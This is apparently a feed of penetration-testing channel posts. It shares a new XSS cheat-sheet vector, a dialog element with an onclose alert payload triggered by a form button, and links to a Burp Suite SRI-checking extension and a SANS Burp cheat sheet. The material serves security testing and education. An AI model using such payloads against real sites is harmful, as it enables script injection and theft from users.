We have another new vector for the XSS cheat sheet! This one requires user interaction and uses the method attribute with the dialog value.
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
sri-check | A Burp Suite extension for identifying missing Subresource Integrity attributes.
https://github.com/PortSwigger/sri-check
https://github.com/PortSwigger/sri-check
Forwarded from π₯OSCP Trainingπ₯π‘βοΈπ¨π»βπ»
Burp Suite Cheat Sheet
https://www.sans.org/security-resources/posters/burp-suite-cheat-sheet/280/download
https://www.sans.org/security-resources/posters/burp-suite-cheat-sheet/280/download
SANS Institute
Burp Suite Cheat Sheet
This cheat sheet enables users of Burp Suite with quicker operations and more ease of use. Burp Suite is the de-facto penetration testing tool for assessing web applications. It enables penetration testers to rapidly test applications via signature featuresβ¦